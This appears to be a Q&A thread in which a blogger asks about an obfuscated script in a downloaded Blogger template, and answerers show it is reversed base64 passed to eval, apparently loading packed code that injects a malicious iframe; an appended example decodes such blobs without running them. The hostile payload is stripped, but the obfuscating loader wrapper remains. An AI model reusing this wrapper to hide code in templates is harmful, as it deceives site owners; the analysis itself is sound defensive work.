Reputation: 6893
I have the script below and I don't know where to start searching because I am not familiar with the code.
That code is included on my blog at blogger.com.
To be specific, it came from the template I downloaded.
I wanted to modify that code because it's injecting some text and I am curious how they did it.
What it does is, when I remove the element with the id="someID", they redirect my page to their website.
Note: I deleted some of the script in the middle part because it is too long and can't be handled by this site.
UPDATE: I deleted the middle value of var I1I.
Here is the complete script: http://jsfiddle.net/0xmz6cf6/
<script>//<![CDATA[
var I1I='=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';
function _0lO(data) {
    var _10OlOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
        enc = '';
    do {
        h1 = _10OlOI.indexOf(data.charAt(i++));
        h2 = _10OlOI.indexOf(data.charAt(i++));
        h3 = _10OlOI.indexOf(data.charAt(i++));
        h4 = _10OlOI.indexOf(data.charAt(i++));
        bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
        o1 = bits >> 16 & 0xff;
        o2 = bits >> 8 & 0xff;
        o3 = bits & 0xff;
        if (h3 == 64) {
            enc += String.fromCharCode(o1)
        } else if (h4 == 64) {
            enc += String.fromCharCode(o1, o2)
        } else {
            enc += String.fromCharCode(o1, o2, o3)
        }
    } while (i < data.length);
    return enc
}
function _10O(string) {
    var ret = '',
        i = 0;
    for (i = string.length - 1; i >= 0; i--) {
        ret += string.charAt(i);
    }
    return ret;
}
eval(_0lO(_10O(I1I)));
//]]>
</script>
Upvotes: 0
Views: 315
Reputation: 106365
It's not a 'coding language' per se: it's just an attempt to obfuscate the code that's executed on the page. And it's (at least) double-encoded actually.
The first stage is quite easy to unwrap: just replace eval(_0lO(_10O(I1I))) with something like console.log(_0lO(_10O(I1I))) - and you'll have the source in your console. I've prepared a simple demo, but it obviously won't show the whole code (as you removed some part of the encoded text).
What you get, however, is not the code to work on yet - it's the result of packer processing of the original source, the second stage I mentioned. Here's the question that discusses the issue in more detail. The bottom line is that there's a useful site that'll allow you to unpack the code.
Upvotes: 2
Reputation: 5084
So, I dug a bit deeper and this is what I found:
function _10O(string) {
    var ret = '',
        i = 0;
    for (i = string.length - 1; i >= 0; i--) {
        ret += string.charAt(i);
    }
    return ret;
}
This function does nothing other than mirroring a given string. So ABC would be CBA after. It is used to mirror the given var I1I (which is actually mirrored base64) to base64. Then it is base64-decoded by the _0lO function.
The output of this operation _0lO(_10O(I1I)) should be something like:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){............ // I have stripped that here to not include any malicious code inside Stack Overflow!
This is still an obfuscated string, but it will then get executed by the eval in your script.
Have a look at this site about malicious scripts, where I found the actual content of the script by using a Google search with parts of the decoded content of your script.
So let's assume: This is a malicious, obfuscated and base64 encoded script used to open up an <iframe> to a malicious site.
Note: Running this on my machine resulted in an antivirus popup, so be careful with that. I've stripped the code to not include the whole malicious eval content.
Upvotes: 1
Reputation: 101652
The code you have there is base64-encoded data that has been reversed back-to-front.
In this line:
eval(_0lO(_10O(I1I)));
_10O(I1I) reverses I1I so that it's in the right order.
_0lO() decodes that from base64 into data (which in this case is a regular string value containing obfuscated JavaScript).
eval() (which is known to be evil, BTW) evaluates the decoded text as JavaScript.
To find out what script is there, simply replace the above line with this:
console.log(_0lO(_10O(I1I)));
As far as modifying it, I'd say just take the decoded code, modify it, and then put it back on your site without the silly encoding that just about anyone can crack.
Upvotes: 2
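The unwrapping the answers above describe, as an added example that is not part of the original thread: it reverses and base64-decodes a blob, then reads the packer word list as plain text instead of passing anything to eval(). The names decodeStage1, triage and WATCHLIST are hypothetical, the sample blob is constructed and harmless, and the trailing 'word|word'.split('|') layout is assumed from the packer's usual output because the thread truncates it.

```javascript
// Added example (not from the original thread): static triage of a blob that is
// base64 written back-to-front. Nothing is passed to eval().
// The packer wrapper is commonly emitted as (p,a,c,k,e,d) or (p,a,c,k,e,r).
const PACKER_HEAD = /^\s*eval\(function\(p,a,c,k,e,[dr]\)/;
// Hypothetical list of words worth a closer look in a blog template script.
const WATCHLIST = ['eval', 'iframe', 'location', 'href', 'getElementById', 'write'];

function reverseString(s) {
  return s.split('').reverse().join('');
}

// Stage 1: undo the reversal, validate, then base64-decode to text.
function decodeStage1(blob) {
  const b64 = reverseString(blob.trim());
  if (b64.length % 4 !== 0 || !/^[A-Za-z0-9+/]*={0,2}$/.test(b64)) {
    throw new Error('input is not reversed base64');
  }
  return atob(b64); // atob is global in browsers and in Node.js 16+
}

// Stage 2: recognise packer output and read its word list without running it.
function triage(text) {
  const packed = PACKER_HEAD.test(text);
  const dict = /'([^']*)'\.split\('\|'\)/.exec(text);
  const words = packed && dict ? dict[1].split('|').filter(Boolean) : [];
  return {
    packed,
    wordCount: words.length,
    flagged: WATCHLIST.filter((w) => words.includes(w)),
  };
}

// Constructed, harmless sample shaped like packer output (body omitted, never run).
const SAMPLE_STAGE2 =
  "eval(function(p,a,c,k,e,d){/* omitted */}('0.1(\"2\")',5,5," +
  "'document|getElementById|someID|location|href'.split('|'),0,{}))";
const SAMPLE_BLOB = reverseString(btoa(SAMPLE_STAGE2));

function demo() {
  const stage2 = decodeStage1(SAMPLE_BLOB);
  return { stage2, report: triage(stage2) };
}

console.log(demo().report);
```

Words that come back in flagged are leads for reading the unpacked source, not a verdict on the script.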